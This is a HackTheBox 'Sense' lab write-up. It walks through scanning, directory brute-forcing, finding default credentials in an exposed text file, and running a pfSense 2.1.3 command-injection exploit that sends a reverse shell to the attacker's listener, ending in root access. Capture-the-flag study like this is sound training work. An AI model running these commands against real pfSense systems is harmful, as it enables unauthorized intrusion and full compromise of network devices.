SENSE — HackTheBox WriteUp
This box is a part of TJnull’s list of boxes. I am doing these boxes as a part of my preparation for OSCP. I will be sharing the writeups of the same here as well.
SENSE is a FREEBSD machine, and is of EASY difficulty.
Do a rustscan to check for open ports.
rustscan -a 10.10.10.60 --ulimit 5000 -- -A
Port 80 and 443 are open. I ran ffuf for directory busting:
ffuf -w '/usr/share/wordlists/dirb/common.txt' -u 'https://10.10.10.60/FUZZ'
Go to https://10.10.10.60/index.php. I found this:
I tried some basic SQL Injection attacks, but none worked. Now, in the source code of the page, we can see that it is pfsense (also, pf is written on the two circles, but they are not visible properly). I searched for exploits of pfsense and tried a lot of them, but none seemed to work. Also, the default creds: admin and pfsense didn’t work either. I ran ffuf again but this time with a bigger wordlist and some extensions:
ffuf -w '/usr/share/wordlists/dirb/big.txt' -u 'https://10.10.10.60/FUZZ' -t 64 -e '.php,.txt,.html'
A lot of directories there. (Note: All directories with Words: 907 are a redirect to the login page, so no use checking them out as of now). I started enumerating these. Meanwhile, in the background, I had ffuf running again with an even bigger wordlist:
ffuf -w '/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt' -u 'https://10.10.10.60/FUZZ' -t 64 -e '.php,.txt,.html'
The contents of /changelog.txt:
Ok, so it seems there can be some issue with the firewall. I checked the ffuf scan:
Visiting the /system-users.txt:
So, the username is rohit, and the password is default (pfsense). Let’s see if we can login as rohit and pfsense in the login page:
And that’s it! We are logged in. Now let’s try another one of the exploits we found earlier. I’m gonna use this one:
Offensive Security's Exploit Database Archive
usr/bin/env python3 # Exploit Title: pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection. # Date: 2018-01-12 #…
I ran the following command:
python3 43560.py --lhost 10.10.14.6 --lport 1234 --rhost 10.10.10.60 --username rohit --password pfsense
while a nc listener was set-up:
And I got the shell! That too as root!
Get user.txt from /home/rohit/user.txt and root.txt from /root/root.txt
(Note: from the file /etc/version, we can see that the pfsense version was 2.1.3)
We have successfully pwned the box!